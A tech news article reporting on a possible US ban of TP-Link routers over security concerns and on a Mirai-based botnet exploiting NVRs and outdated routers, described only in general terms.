US May Ban TP-Link Routers Next Year Due To Cybersecurity; New Mirai Botnet Exploits NVRs, TP-Link Routers
TP-Link routers have been quite dominant in the US market lately. Seems like the dominance could soon get over as reportedly TP-Link routers could be facing a ban in US next year. Want to know the reason behind it, let’s dive in.
TP-Link Routers Could Be Banned Next Year In US
TP-Link is said to be currently under investigation by a trio of US government agencies including the Departments of Commerce, Defense, and Justice due to security concerns and potential ties to Chinese cyberattacks. These departments might consider putting a ban on TP-Link routers in the US next year.
Previously there have been high-profile cyberattacks involving TP-Link routers, especially the one where Microsoft released details on a password-spraying attack that involved TP-Link routers. It is said that the company allegedly ships the routers with security vulnerabilities and the company is resistant to address these flaws while some reports suggest that the potential ban is more about the company’s ties to China than specific security issues. While the news of this ban spread like wildfire, a TP-Link representative told CNET, “TP-Link has a secure, vertically integrated and US-owned international supply chain. Nearly all products sold in the United States are manufactured in Vietnam.”
Several cybersecurity experts believe that it is likely that intelligence agencies have found something with TP-Link routers that warrants a ban. TP-Link routers do come with a flaw but so do the other routers, so a vulnerability issue might not be the only reason.
Well if the US government decides to put a ban on TP-Link routers then this will be a massive loss to the company as they make up about 65% of the US market.
In another report by Bleeping Computer, it is revealed that a new Mirai-based botnet is actively exploiting vulnerabilities in NVRs, and TP-Link Routers.
New Botnet Exploiting NVRs, TP-Link Routers
As per the report, this botnet is actively exploiting a remote code execution vulnerability that has not received a tracker number and appears to be unpatched in DigiEver DS-2015 Pro NVRs. The campaign is said to have started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.
According to Akamai researchers, the botnet started to exploit the flaw in mid-November but the campaign has been active since September. This new Mirai malware variant targets CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers. Further, the researchers revealed thatthe Mirai variant is notable for its use of XOR and ChaCha20 encryption and its targeting of a broad range of system architectures, including x86, ARM, and MIPS.
It is revealed that through command injection, the attackers fetch malware binary from an external server and enlist the device into its botnet. Persistence is achieved by adding cron jobs. Once the device is compromised, it is then used to conduct distributed denial of service attacks or to spread to other devices by leveraging exploit sets and credential lists.
